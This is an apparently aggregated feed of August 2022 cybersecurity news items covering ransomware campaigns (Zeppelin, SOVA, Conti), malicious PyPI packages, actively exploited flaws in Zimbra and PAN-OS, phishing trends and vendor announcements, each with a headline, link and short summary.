                Autosummary: Backups: implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud). While anyone can fall victim to these threat actors, the FBI noted that this malware has been used to target a wide range of businesses and critical infrastructure organizations, including defense contractors, educational institutions, manufacturers, technology companies, and especially organizations in the healthcare and medical industries.


                Quick Heal collaborates with RevBits to strengthen its cybersecurity portfolio

                ciber
                2022-08-16 https://www.helpnetsecurity.com/2022/08/17/quick-heal-revbits/

                Quick Heal Technologies has collaborated with RevBits to address the protection need for an on-premise infrastructure of government organisations. The partnership will help Quick Heal enhance its Seqrite product portfolio while enabling RevBits to expand its market presence in India. The association also aims to help government organizations that prefer to run their critical systems on-premise rather than in the cloud, thereby ensuring that they operate safely and seamlessly without the fear of cyberattacks. Dr. … More

                The post Quick Heal collaborates with RevBits to strengthen its cybersecurity portfolio appeared first on Help Net Security.

                "



                IRONSCALES partners with Distology to protect organizations from phishing attacks

                financial
                2022-08-16 https://www.helpnetsecurity.com/2022/08/17/ironscales-distology/

                IRONSCALES has partnered with Distology, to expand the distribution of email and messaging platform cybersecurity solutions to organizations throughout the UK and EMEA. “As business networks of all sizes are becoming increasingly distributed across cloud services, cybersecurity concerns continue to rise. Security teams are struggling with phishing attacks slipping through existing technology and are lacking awareness training to adequately equip employees. IRONSCALES integrated email security and security awareness training solution is needed now more than … More

                The post IRONSCALES partners with Distology to protect organizations from phishing attacks appeared first on Help Net Security.

                "



                Why it’s past time we operationalized cybersecurity

                ciber
                2022-08-15 https://www.helpnetsecurity.com/2022/08/15/operationalizing-cybersecurity/

                Enterprises are investing more in cybersecurity than ever before, but we’re also seeing a record number of breaches. More than 5.1 billion pieces of personal information were reported stolen last year, and the average cost of a breach has climbed to $4.35 million. Have the threat actors really become that good? Or is this a business failing? It can’t be denied that cyber criminals have become more organized, and more advanced tools and tactics are … More

                The post Why it’s past time we operationalized cybersecurity appeared first on Help Net Security.

                "

                Autosummary: This isn’t a single measurement, but rather applies to each of those core foundations: culture, accountability, processes, resources, automation, and measurement. The first step toward operationalizing cybersecurity is to start thinking of it just like any other business investment. Every business needs to deliver on several core foundations to be successful.


                Credential phishing attacks skyrocketing, 265 brands impersonated in H1 2022

                financial
                2022-08-15 https://www.helpnetsecurity.com/2022/08/15/landscape-email-threat/

                Abnormal Security released a report which explores the current email threat landscape and provides insight into the latest advanced email attack trends, including increases in business email compromise, the evolution of financial supply chain compromise and the rise of brand impersonation in credential phishing attacks. The research found a 48% increase in email attacks over the previous six months, and 68.5% of those attacks included a credential phishing link. In addition to posing as internal … More

                The post Credential phishing attacks skyrocketing, 265 brands impersonated in H1 2022 appeared first on Help Net Security.

                Autosummary: Abnormal Security released a report which explores the current email threat landscape and provides insight into the latest advanced email attack trends, including increases in business email compromise, the evolution of financial supply chain compromise and the rise of brand impersonation in credential phishing attacks.


                Ransomware is back, healthcare sector most targeted

                exploits
                2022-08-15 https://www.helpnetsecurity.com/2022/08/15/healthcare-organizations-targeted/

                In Q2 2022, Kroll observed a 90% increase in the number of healthcare organizations targeted in comparison with Q1 2022, dropping the final nail in the coffin for the “truce” some criminal groups instituted earlier in the COVID-19 pandemic. Ransomware helped to fuel this uptick against healthcare as attacks increased this quarter to once again become the top threat, followed closely by email compromise. While phishing continued to be the vector used for initial access, … More

                The post Ransomware is back, healthcare sector most targeted appeared first on Help Net Security.



                A new PyPI Package was found delivering fileless Linux Malware

                exploits
                2022-08-15 https://securityaffairs.co/wordpress/134381/security/pypi-package-fileless-linux-malware.html

                Security researchers discovered a new PyPI package designed to drop a fileless cryptominer onto Linux systems. Sonatype researchers have discovered a new PyPI package named ‘secretslib’ that drops a fileless cryptominer into the memory of Linux machines. The package describes itself as “secrets matching and verification made easy”; it has a total of 93 downloads since […]

                The post A new PyPI Package was found delivering fileless Linux Malware appeared first on Security Affairs.



                SOVA Android Banking Trojan Returns With New Capabilities and Targets

                financial exploits
                2022-08-15 https://thehackernews.com/2022/08/sova-android-banking-trojan-returns-new.html
                The SOVA Android banking trojan is continuing to be actively developed with upgraded capabilities to target no less than 200 mobile applications, including banking apps and crypto exchanges and wallets, up from 90 apps when it started out. That's according to the latest findings from Italian cybersecurity firm Cleafy, which found newer versions of the malware sporting functionality to intercept



                Callback phishing attacks see massive 625% growth since Q1 2021

                financial
                2022-08-15 https://www.bleepingcomputer.com/news/security/callback-phishing-attacks-see-massive-625-percent-growth-since-q1-2021/
                Phishing is constantly evolving to bypass user training and email protections, and as threat actors adopt new tactics with better success ratios, quarterly stats reflect interesting threat trends on multiple fronts. [...]

                Autosummary: Cape Verde domains are used by many phishing actors (Agari). As discussed in a report by Palo Alto Networks late last year, phishing actors use domains from small island countries, in this case Cape Verde, due to their lax anti-abuse regulations that help them generate national income.


                SOVA Android malware now also encrypts victims’ files

                exploits
                2022-08-15 https://securityaffairs.co/wordpress/134392/malware/sova-android-malware-v5.html

                Security researchers from Cleafy reported that the SOVA Android banking malware is back and is rapidly evolving. The SOVA Android banking trojan has been improved: it has a new ransomware feature that encrypts files on Android devices, Cleafy researchers report. The malware has been active since 2021 and evolves over time. The latest version of the […]

                The post SOVA Android malware now also encrypts victims’ files appeared first on Security Affairs.

                Autosummary: These features, combined with Accessibility services, enable TAs to perform gestures and, consequently, fraudulent activities from the infected device, as we have already seen in other Android Banking Trojans (e.g. Oscorp or BRATA).”


                Microsoft disrupts SEABORGIUM’s ongoing phishing operations

                financial
                2022-08-15 https://securityaffairs.co/wordpress/134414/apt/seaborgiums-targets-nato.html

                Microsoft disrupted a hacking operation conducted by the Russia-linked APT SEABORGIUM and aimed at NATO countries. The Microsoft Threat Intelligence Center (MSTIC) has disrupted activity by SEABORGIUM (aka ColdRiver, TA446), a Russia-linked threat actor that is behind a persistent hacking campaign targeting people and organizations in NATO countries. SEABORGIUM has been active since at least 2017, […]

                The post Microsoft disrupts SEABORGIUM’s ongoing phishing operations appeared first on Security Affairs.

                Autosummary: Microsoft has disrupted activity by SEABORGIUM, a Russia-based actor launching persistent phishing, credential and data theft, intrusions, and hack-and-leak campaigns tied to espionage.


                Introducing Malwarebytes Cloud Storage Scanning: How to scan for malware in cloud file storage repositories

                exploits
                2022-08-15 https://www.malwarebytes.com/blog/business/2022/08/introducing-malwarebytes-cloud-storage-scanning-how-to-scan-for-malware-in-cloud-file-storage-repositories

                Categories: Business

                We’re excited to announce Malwarebytes Cloud Storage Scanning, a new service which extends Nebula malware scanning options to include files stored on cloud storage repositories that are part of your organization’s digital ecosystem.


                The post Introducing Malwarebytes Cloud Storage Scanning: How to scan for malware in cloud file storage repositories appeared first on Malwarebytes Labs.

                Autosummary: An additional layer of security: While integrated cloud malware detection solutions (e.g. BoxShield for Box.com; MS Defender for OneDrive) can be useful, many businesses use multiple different cloud storage repositories, and due to lack of integration options, are unable to get a centralized view of all of their scan results, across multiple repositories, in a single security-focused pane of glass. Scanning for cloud malware: In Nebula, go to “Settings” and click “Cloud Storage Scans”.


                CISA, FBI shared a joint advisory to warn of Zeppelin ransomware attacks

                exploits ransomware
                2022-08-14 https://securityaffairs.co/wordpress/134350/cyber-crime/zeppelin-ransomware-joint-alert.html

                The US Cybersecurity and Infrastructure Security Agency (CISA) and the FBI are warning of Zeppelin ransomware attacks. The US Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) have published a joint advisory to warn of Zeppelin ransomware attacks. The Zeppelin ransomware first appeared on the threat landscape in November 2019 […]

                The post CISA, FBI shared a joint advisory to warn of Zeppelin ransomware attacks appeared first on Security Affairs.

                Autosummary: To mitigate the risks of ransomware attacks, organizations are recommended to define a recovery plan, implement multi-factor authentication, keep all operating systems, software, and firmware up to date, enforce a strong password policy, segment networks, disable unused ports and services, audit user accounts and domain controllers, implement a least-privilege access policy, review domain controllers, servers, workstations, and active directories, maintain offline backups of data, and identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a network monitoring tool.


                Patch Tuesday update addresses 123 vulnerabilities, two critical zero-days

                exploits
                2022-08-13 https://www.computerworld.com/article/3669897/patch-tuesday-update-addresses-123-vulnerabilities-two-critical-zero-days.html#tk.rss_security

                Microsoft's August Patch Tuesday release addresses 123 security issues in Microsoft Windows, Office, Exchange (it's back!) and Visual Studio — and unfortunately, we have two zero-days with reports of active exploitation in the wild. Since this is a broad update, it will require planning and testing before deployment.

                The first (CVE-2022-34713) occurs in the Windows diagnostic tools and the second (CVE-2022-30134) affects Microsoft Exchange. Basically, the holidays are over and it's time to pay attention to Microsoft updates again. We have made "Patch Now" recommendations for Windows, Exchange and Adobe for this month.


                Autosummary: Each month, we break down the update cycle into product families (as defined by Microsoft) with the following basic groupings: Browsers (Microsoft IE and Edge); Microsoft Windows (both desktop and server); Microsoft Office; Microsoft Exchange; Microsoft Development platforms (ASP.NET Core, .NET). You will not find these latest updates in the Microsoft catalog, so I have included a list of updates available for the following specific builds of Exchange Server: Exchange Server 2013 CU23; Exchange Server 2016 CU22 and CU23; Exchange Server 2019 CU11 and CU12. Given the publicly disclosed vulnerability in Microsoft Exchange (CVE-2022-30134) which allows an attacker to read targeted email messages, Microsoft has recommended you apply these security related fixes immediately (italics added by Microsoft). Key testing scenarios: Given the large number of changes included in this August patch cycle, I have broken down the testing scenarios into high risk and standard risk groups. High Risk: These are likely to include functionality changes, may deprecate existing functionality and will likely require creating new testing plans. Service Stack Update: There is a significant change to the Microsoft Servicing Stack (SSU). Microsoft explains, "When you start Outlook Desktop, it gets past loading profile and processing, briefly opens, and then stops responding." Microsoft is currently working on the issue and we expect an update soon. Microsoft Office: Microsoft released an out-of-band (OOB) patch (KB5002248) for Microsoft Office 2016 (both 32- and 64-bit) relating to VBA projects and Microsoft Access. Major revisions: Though we have fewer "new" patches released this month, there are a lot of updated and newly released patches from previous months: CVE-2022-26832: .NET Framework Denial of Service Vulnerability. Given the changes to the SSU, Windows Boot Manager and updates to the Windows kernel (WIN32KY.SYS) this month, it may be worth having a look at some Microsoft testing platforms such as the Microsoft Test Authoring and Execution Framework (TAEF).


                SOVA malware adds ransomware feature to encrypt Android devices

                exploits ransomware
                2022-08-13 https://www.bleepingcomputer.com/news/security/sova-malware-adds-ransomware-feature-to-encrypt-android-devices/
                The SOVA Android banking trojan continues to evolve with new features, code improvements, and the addition of a new ransomware feature that encrypts files on mobile devices. [...]

                Autosummary: Moreover, it features refactored and improved code that helps it operate more stealthily on the compromised device, while its latest version, 5.0, adds a ransomware module.


                Ransomware is not going anywhere: Attacks are up 24%

                exploits
                2022-08-12 https://www.helpnetsecurity.com/2022/08/12/increase-ransomware-attacks/

                Avast released a report revealing a significant increase in global ransomware attacks, up 24% from Q1/2022. Researchers also uncovered a new zero-day exploit in Chrome, as well as signals of how cybercriminals are preparing to move away from macros as an infection vector. Ransomware attacks increase: After months of decline, global ransomware attacks increased significantly in Q2/2022, up 24% from the previous quarter. The highest quarter-on-quarter increases in ransomware risk ratio occurred in Argentina (+56%), UK … More

                The post Ransomware is not going anywhere: Attacks are up 24% appeared first on Help Net Security.

                Autosummary: The highest quarter-on-quarter increases in ransomware risk ratio occurred in Argentina (+56%), UK (+55%), Brazil (+50%), France (+42%), and India (+37%).


                Organizations would like the government to help with ransomware demand costs

                exploits government ransomware
                2022-08-12 https://www.helpnetsecurity.com/2022/08/12/government-help-ransomware/

                Businesses are increasingly concerned about how they will meet ransomware demands. Only 19 percent of those surveyed have ransomware coverage limits above $600,000, while over half (59 percent) hoped the government would cover damages when future attacks are linked to other nation-states, according to BlackBerry Limited and Corvus Insurance. SMBs, which have become a favorite criminal target, are especially feeling the heat. Of businesses with under 1,500 employees, only 14 percent have a coverage limit … More

                The post Organizations would like the government to help with ransomware demand costs appeared first on Help Net Security.

                Autosummary: Only 19 percent of those surveyed have ransomware coverage limits above $600,000, while over half (59 percent) hoped the government would cover damages when future attacks are linked to other nation-states, according to BlackBerry Limited and Corvus Insurance.


                The impact of exploitable misconfigurations on network security

                exploits
                2022-08-12 https://www.helpnetsecurity.com/2022/08/12/impact-exploitable-misconfigurations-network-security/

                Network professionals feel confident about their security and compliance practices, but data suggests that they also leave their organizations open to risk, which is costing a significant amount of revenue, according to Titania. In addition, some businesses are not minimizing their attack surface effectively. Companies are prioritizing firewall security and report a fast time to respond to misconfigurations when these are detected in annual audits. However, switches and routers are only included in 4% of audits and … More

                The post The impact of exploitable misconfigurations on network security appeared first on Help Net Security.

                Autosummary: Specifically, the study, which surveyed 160 senior cybersecurity decision-makers across the U.S. Military, Federal Government, Oil and Gas, Telecoms, and Financial Services sectors, revealed: Misconfigurations cost organizations millions: Organizations stated that misconfigurations cost an average of 9% of their annual revenue, but the true cost is likely to be higher.


                25% of employees don’t care enough about cybersecurity to report a security incident

                ciber
                2022-08-12 https://www.helpnetsecurity.com/2022/08/12/strong-cybersecurity-posture-video/

                According to a new Tessian report, 30% of employees do not think they personally play a role in maintaining their company’s cybersecurity posture. This Help Net Security video reveals why a strong security culture is important in maintaining a strong security posture.

                The post 25% of employees don’t care enough about cybersecurity to report a security incident appeared first on Help Net Security.



                Malicious PyPI packages drop ransomware, fileless malware

                exploits ransomware
                2022-08-12 https://www.helpnetsecurity.com/2022/08/12/malicious-pypi-packages-drop-ransomware-fileless-malware-video/

                In this Help Net Security video, Ax Sharma, Senior Security Researcher at Sonatype, discusses newly found PyPI packages that pack ransomware, and another package that appears to be safe but silently drops fileless malware to mine cryptocurrency (Monero) on the infected system – all while evading detection.

                The post Malicious PyPI packages drop ransomware, fileless malware appeared first on Help Net Security.



                Cisco Patches High-Severity Vulnerability Affecting ASA and Firepower Solutions

                exploits
                2022-08-12 https://thehackernews.com/2022/08/cisco-patches-high-severity.html
                Cisco on Wednesday released patches to contain multiple flaws in its software that could be abused to leak sensitive information on susceptible appliances. The issue, assigned the identifier CVE-2022-20866 (CVSS score: 7.4), has been described as a "logic error" when handling RSA keys on devices running Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD)



                Researchers Warn of Ongoing Mass Exploitation of Zimbra RCE Vulnerability

                exploits
                2022-08-12 https://thehackernews.com/2022/08/researchers-warn-of-ongoing-mass.html
                The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added two flaws to its Known Exploited Vulnerabilities Catalog, citing evidence of active exploitation. The two high-severity issues relate to weaknesses in Zimbra Collaboration, both of which could be chained to achieve unauthenticated remote code execution on affected email servers - CVE-2022-27925 (CVSS score: 7.2)



                Ransomware attack blamed for closure of all 7-Eleven stores in Denmark

                exploits
                2022-08-12 https://www.tripwire.com/state-of-security/security-data-protection/ransomware-attack-blamed-closure-7-eleven-stores-denmark/
                Ransomware is to blame for the closure of all 175 7-Eleven stores in Denmark on Monday. The retailer closed all of its stores in Denmark after its cash registers and payment systems were brought down in the attack. Read more in my article on the Tripwire State of Security blog.

                Autosummary: Initially, 7-Eleven’s Danish division did not say that ransomware was responsible for its problems, simply describing the incident as a “hacker attack”: “We suspect that we have been the victim of a hacker attack today.


                Chinese criminals scam kids desperate to play games for more than three hours a week

                financial
                2022-08-12 https://www.bitdefender.com/blog/hotforsecurity/chinese-criminals-scam-kids-desperate-to-play-games-for-more-than-three-hours-a-week/
                Scammers are stealing money from children, with the alluring but bogus promise that China's tough restrictions on online gaming can be subverted. Read more in my article on the Hot for Security blog.



                U.S. Government Offers $10 Million Reward for Information on Conti Ransomware Gang

                exploits government ransomware
                2022-08-12 https://thehackernews.com/2022/08/us-government-offers-10-million-reward.html
                The U.S. State Department on Thursday announced a $10 million reward for information related to five individuals associated with the Conti ransomware group. The reward offer, first reported by WIRED, is also notable for the fact that it marks the first time the face of a Conti associate, known as "Target," has been unmasked. The four other associates have been referred to as "Tramp," "Dandis," "



                Experts warn of mass exploitation of an RCE flaw in Zimbra Collaboration Suite

                exploits
                2022-08-12 https://securityaffairs.co/wordpress/134314/hacking/zimbra-rce-actively-exploited.html

                Threat actors are exploiting an authentication bypass Zimbra flaw, tracked as CVE-2022-27925, to hack Zimbra Collaboration Suite email servers worldwide. An authentication bypass affecting Zimbra Collaboration Suite, tracked as CVE-2022-27925, is actively exploited to hack ZCS email servers worldwide. Zimbra is an email and collaboration platform used by more than 200,000 businesses from over 140 countries. Yesterday, August 11, CISA has […]

                The post Experts warn of mass exploitation of an RCE flaw in Zimbra Collaboration Suite appeared first on Security Affairs.

                Autosummary: The countries with the most compromised instances include the U.S., Italy, Germany, France, India, Russia, Indonesia, Switzerland, Spain, and Poland. The two issues are: CVE-2022-27925 (CVSS score: 7.2) – Zimbra Collaboration (ZCS) Arbitrary File Upload Vulnerability: Zimbra Collaboration (ZCS) contains a flaw in the mboximport functionality, allowing an authenticated attacker to upload arbitrary files to perform remote code execution.


                BazarCall attacks have revolutionized ransomware operations

                exploits ransomware
                2022-08-12 https://securityaffairs.co/wordpress/134302/cyber-crime/bazarcall-revolutionized-ransomware-operations.html

                The Conti ransomware gang is using BazarCall phishing attacks as an initial attack vector to access targeted networks. The BazarCall attack, aka callback phishing, is an attack vector that utilizes a targeted phishing methodology and was first used by the Ryuk ransomware gang in 2020/2021. The BazarCall attack chain is composed of the following stages: Stage […]

                The post BazarCall attacks have revolutionized ransomware operations appeared first on Security Affairs.

                Autosummary: The adoption of callback phishing campaigns has impacted the strategy of ransomware gangs; experts observed targeted attacks aimed at the Finance, Technology, Legal, and Insurance industries. It involved large investments into hiring spammers, OSINT specialists, designers, call center operators, and expanding the number of network intruders.


                Palo Alto Networks: New PAN-OS DDoS flaw exploited in attacks

                exploits
                2022-08-12 https://www.bleepingcomputer.com/news/security/palo-alto-networks-new-pan-os-ddos-flaw-exploited-in-attacks/
                Palo Alto Networks has issued a security advisory warning of an actively exploited high-severity vulnerability impacting PAN-OS, the operating system used by the company's networking hardware products. [...]

                Autosummary: PAN-OS prior to 10.1.6-h6 (patch available); PAN-OS prior to 10.0.11-h1 (patch ETA: next week); PAN-OS prior to 9.1.14-h4 (patch ETA: next week); PAN-OS prior to 9.0.16-h3 (patch ETA: next week).


                Chinese hackers backdoor chat app with new Linux, macOS malware

                exploits
                2022-08-12 https://www.bleepingcomputer.com/news/security/chinese-hackers-backdoor-chat-app-with-new-linux-macos-malware/
                Versions of a cross-platform instant messenger application focused on the Chinese market known as "MiMi" have been trojanized to deliver a new backdoor (dubbed rshell) that can be used to steal data from Linux and macOS systems. [...]

                Autosummary: Also targeting Zoho and Exchange servers: APT27 (aka Emissary Panda, Iron Tiger, and LuckyMouse) is a Chinese-backed threat group active for over a decade (since at least 2010) and known for its focus on cyber espionage and information theft campaigns.


                Twilio: 125 customers affected by data breach, no passwords stolen

                financial
                2022-08-12 https://www.bleepingcomputer.com/news/security/twilio-125-customers-affected-by-data-breach-no-passwords-stolen/
                Cloud communications giant Twilio, the owner of the highly popular two-factor authentication (2FA) provider Authy, says that it has so far identified 125 customers who had their data accessed during a security breach discovered last week. [...]



                Feds: Zeppelin Ransomware Resurfaces with New Compromise, Encryption Tactics

                exploits ransomware industry
                2022-08-12 https://threatpost.com/zeppelin-ransomware-resurfaces/180405/
                The CISA has seen a resurgence of the malware targeting a range of verticals and critical infrastructure organizations by exploiting RDP, firewall vulnerabilities.

                Autosummary: Multiple Encryption: Once Zeppelin ransomware is executed on a network, each encrypted file is appended with a randomized nine-digit hexadecimal number as a file extension, e.g., file.txt.txt.C59-E0C-929, according to the CISA.


                The US offers a $10M reward for info on the Conti ransomware gang’s members

                exploits ransomware
                2022-08-12 https://securityaffairs.co/wordpress/134326/cyber-crime/conti-ransomware-reward.html

                The U.S. State Department announced a $10 million reward for information related to five individuals associated with the Conti ransomware gang. The U.S. State Department announced a $10 million reward for information on five prominent members of the Conti ransomware gang. The government will also reward people that will provide details about Conti and its affiliated groups TrickBot and Wizard […]

                The post The US offers a $10M reward for info on the Conti ransomware gang’s members appeared first on Security Affairs.

                Autosummary: “That photo is the first time the US government has ever identified a malicious actor associated with Conti.” The other members of the Conti gang for which the US Government is offering a reward are referred to as “Tramp,” “Dandis,” “Professor,” and “Reshaev.”


                The Week in Ransomware - August 12th 2022 - Attacking the defenders

                exploits ransomware
                2022-08-12 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-12th-2022-attacking-the-defenders/
                It was a very busy week for ransomware news and attacks, especially with the disclosure that Cisco was breached by a threat actor affiliated with the Yanluowang ransomware gang. [...]

                Autosummary: Contributors and those who provided new ransomware information and stories this week include: @demonslay335, @Ionut_Ilascu, @PolarToffee, @malwareforme, @LawrenceAbrams, @DanielGallagher, @VK_Intel, @fwosar, @struppigel, @Seifreed, @BleepinComputer, @billtoulas, @serghei, @malwrhunterteam, @FourOctets, @jorntvdw, @fiskerlarsen, @Sophos, @y_advintel, @AdvIntel, @Cyberknow20, @kaspersky, @PaloAltoNtwks, @AhnLab_SecuInfo, @ReversingLabs, @pcrisk, @Amigo_A_, @jamiemaccol, @Jarnecki, and @PogoWasRight. Finally, the US government published a picture of a Conti ransomware member for the first time, asking people to provide info on members named "Target," "Tramp," "Dandis," "Professor," and "Reshaev."


                The potential consequences of data breach, and romance scams – Week in security with Tony Anscombe

                financial
                2022-08-12 https://www.welivesecurity.com/videos/data-breach-romance-scams-week-in-security-with-tony-anscombe/

                The NHS was the victim of a potential cyberattack, which raises the question of the impact of such data breaches on the public.

                The post The potential consequences of data breach, and romance scams – Week in security with Tony Anscombe appeared first on WeLiveSecurity



                Researchers found one-click exploits in Discord and Teams

                exploits
                2022-08-12 https://www.malwarebytes.com/blog/news/2022/08/a-vulnerability-was-found-in-electron-which-is-what-drives-discord-spotify-and-microsoft-teams

                Categories: Exploits and vulnerabilities, News

                Tags: Discord, Spotify, MicrosoftTeams, Electron, ElectronJS, NodeJS, V8 Chrome, Log4Shell, Log4j

                A group of security researchers found a series of vulnerabilities in the software underlying popular apps like Discord, Microsoft Teams, and many others


                The post Researchers found one-click exploits in Discord and Teams appeared first on Malwarebytes Labs.

                Autosummary: Posted: August 12, 2022. A group of security researchers found a series of vulnerabilities in the software underlying popular apps like Discord, Microsoft Teams, Spotify and many others. A group of security researchers have discovered a series of vulnerabilities in Electron, the software underlying popular apps like Discord, Microsoft Teams, and many others, used by tens of millions of people all over the world.


                SquarePhish: Advanced phishing tool combines QR codes and OAuth 2.0 device code flow

                financial
                2022-08-11 https://www.helpnetsecurity.com/2022/08/11/squarephish-video/

                In this Help Net Security video, Security Consultant Kam Talebzadeh and Senior Security Researcher Nevada Romsdahl from Secureworks showcase SquarePhish, a tool that combines QR codes and OAuth 2.0 device code flow for advanced phishing attacks. SquarePhish is available for download on GitHub. If you’re at Black Hat USA 2022, you can learn more about SquarePhish. The authors will be at the Arsenal, doing demos and answering questions on Thursday, August 11, starting at 2:30 PM.

                The post SquarePhish: Advanced phishing tool combines QR codes and OAuth 2.0 device code flow appeared first on Help Net Security.



                Why SAP systems need to be brought into the cybersecurity fold

                ciber
                2022-08-11 https://www.helpnetsecurity.com/2022/08/11/why-sap-systems-need-to-be-brought-into-the-cybersecurity-fold/

                SAP’s status as a leading business process management software provider is undeniable. Today, the company serves over 230 million cloud users and 99 of the top 100 companies in the world with the largest cloud portfolio of any provider, comprising more than 100 solutions covering all business functions. Touching 77% of all transactions and thought to store 70% of all corporate data, SAP systems are a fundamental digital cog in the global economy. But SAP … More

                The post Why SAP systems need to be brought into the cybersecurity fold appeared first on Help Net Security.

                Autosummary: By converging SIEM solutions with Security Orchestration, Automation and Response (SOAR) and User and Entity Behavior Analytics (UEBA), organizations can benefit from automated threat detection, investigation, and response capabilities as well as accurate, risk-based analytics, guiding security teams to combat advanced threats. SAP SCM, for example, is built to support supply chain management specialists with solutions in planning, logistics, manufacturing, and product lifecycle management. In meeting the unique requirements of individual departments, these applications can end up siloed in small pockets of the organization away from central security strategies, making it difficult to monitor, patch and maintain them, let alone spot suspicious or malicious activity.


                ActZero Ransomware Readiness Assessment strengthens ransomware defense for SMEs

                exploits ransomware
                2022-08-11 https://www.helpnetsecurity.com/2022/08/11/actzero-ransomware-readiness-assessment/

                ActZero has launched a Ransomware Readiness Assessment for small and medium-sized enterprises (SMEs). The program simulates a ransomware attack sequence, which can expose vulnerabilities and lateral pathways left open by existing tools. With this valuable visibility businesses can start reducing risk immediately. Adversaries expect small businesses to lack proper ransomware defenses. With ActZero MDR, they can now prove them wrong. Adversaries are turning up the pressure on their victims, demanding average ransoms nearing $1M, and … More

                The post ActZero Ransomware Readiness Assessment strengthens ransomware defense for SMEs appeared first on Help Net Security.

                "

                Autosummary: Over the past few months of assessment activity, ActZero has discovered that, on average, its MDR service was able to detect and block 89% of all common and recent ransomware events techniques and tactics, including emerging threats. "


                IRONSCALES Security Awareness Training educates users about phishing attacks

                financial
                2022-08-11 https://www.helpnetsecurity.com/2022/08/11/ironscales-security-awareness-training/

                IRONSCALES has launched the addition of new advanced Security Awareness Training to help customers better educate their employees on how to spot phishing attacks, improve their overall security knowledge, and learn about multiple industry compliance framework requirements. With this launch, IRONSCALES’ Complete Protect plan customers will gain exclusive access to over a hundred new training videos in nine languages from IRONSCALES’ partner Wizer Training. This new addition streamlines the ability for customers to launch Security … More

                The post IRONSCALES Security Awareness Training educates users about phishing attacks appeared first on Help Net Security.

                "

                Autosummary: "


                Which malware delivery techniques are currently favored by attackers?

                exploits
                2022-08-11 https://www.helpnetsecurity.com/2022/08/11/email-malware-delivery-techniques/

                A wave of cybercriminals spreading malware families – including QakBot, IceID, Emotet, and RedLine Stealer – are shifting to shortcut (LNK) files for email malware delivery. Shortcuts are replacing Office macros – which are starting to be blocked by default in Office – as a way for attackers to get a foothold within networks by tricking users into infecting their PCs with malware. Keeping up with changes in the email threat landscape HP Wolf Security’s … More

                The post Which malware delivery techniques are currently favored by attackers? appeared first on Help Net Security.

                "

                Autosummary: Further key findings in the report include:
                • 14% of email malware captured by HP Wolf Security bypassed at least one email gateway scanner
                • Threat actors used 593 different malware families in their attempts to infect organizations, compared to 545 in the previous quarter
                • Spreadsheets remained the top malicious file type, but the threat research team saw an 11% rise in archive threats – suggesting attackers are increasingly placing files in archive files before sending them in order to evade detection
                • 69% of malware detected was delivered via email, while web downloads were responsible for 17%
                • The most common phishing lures were business transactions such as “Order”, “Payment”, “Purchase”, “Request” and “Invoice”
                “Attackers are testing new malicious file formats or exploits at pace to bypass detection, so organizations must prepare for the unexpected. "


                Ex Twitter employee found guilty of spying for Saudi Arabian government

                government
                2022-08-11 https://securityaffairs.co/wordpress/134266/intelligence/ex-twitter-employee-guilty.html

                A former Twitter employee was found guilty of spying on certain Twitter users for Saudi Arabia. A former Twitter employee, Ahmad Abouammo (44), was found guilty of gathering private information of certain Twitter users and passing them to Saudi Arabia. “Ahmad Abouammo, a US resident born in Egypt, was found guilty by a jury Tuesday […]

                The post Ex Twitter employee found guilty of spying for Saudi Arabian government appeared first on Security Affairs.

                "

                Autosummary: Abouammo and Alzabarah had unauthorized access to information associated with some profiles, including email addresses, devices used, user-provided biographical information, birth dates, logs that contained the user’s browser information, a log of all of a particular user’s actions on the Twitter platform at any given time, and other info that can be used to geo-locate a user such as IP addresses and phone numbers. "


                Hackers Behind Cuba Ransomware Attacks Using New RAT Malware

                exploits ransomware
                2022-08-11 https://thehackernews.com/2022/08/hackers-behind-cuba-ransomware-attacks.html
                Threat actors associated with the Cuba ransomware have been linked to previously undocumented tactics, techniques and procedures (TTPs), including a new remote access trojan called ROMCOM RAT on compromised systems. The new findings come from Palo Alto Networks’ Unit 42 threat intelligence team, which is tracking the double extortion ransomware group under the constellation-themed moniker "

                Autosummary: "Cuba ransomware is distributed through Hancitor malware, a loader known for dropping or executing stealers, such as Remote Access Trojans (RATs) and other types of ransomware, onto victims" networks," according to a December 2021 alert from the U.S. Federal Bureau of Investigation (FBI)." In the intervening months, the ransomware operation has received an upgrade with an aim to "optimize its execution, minimize unintended system behavior, and provide technical support to the ransomware victims if they choose to negotiate," per Trend Micro. "


                FBI: Zeppelin ransomware may encrypt devices multiple times in attacks

                exploits ransomware
                2022-08-11 https://www.bleepingcomputer.com/news/security/fbi-zeppelin-ransomware-may-encrypt-devices-multiple-times-in-attacks/
                The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) warned US organizations today that attackers deploying Zeppelin ransomware might encrypt their files multiple times. [...] "

                Autosummary: "


                UK NHS service recovery may take a month after MSP ransomware attack

                exploits ransomware
                2022-08-11 https://www.bleepingcomputer.com/news/security/uk-nhs-service-recovery-may-take-a-month-after-msp-ransomware-attack/
                Managed service provider (MSP) Advanced confirmed that a ransomware attack on its systems caused the disruption of emergency services (111) from the United Kingdom’s National Health Service (NHS). [...] "

                Autosummary: "


                AA22-223A: #StopRansomware: Zeppelin Ransomware

                exploits ransomware
                2022-08-11 https://us-cert.cisa.gov/ncas/alerts/aa22-223a
                Original release date: August 11, 2022

                Summary

                Actions to take today to mitigate cyber threats from ransomware:

                • Prioritize remediating known exploited vulnerabilities.
                • Train users to recognize and report phishing attempts.
                • Enable and enforce multifactor authentication.

                Note: this joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

                The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint CSA to disseminate known Zeppelin ransomware IOCs and TTPs associated with ransomware variants identified through FBI investigations as recently as 21 June 2022.

                The FBI and CISA encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents.

                Download the PDF version of this report: pdf, 999 kb

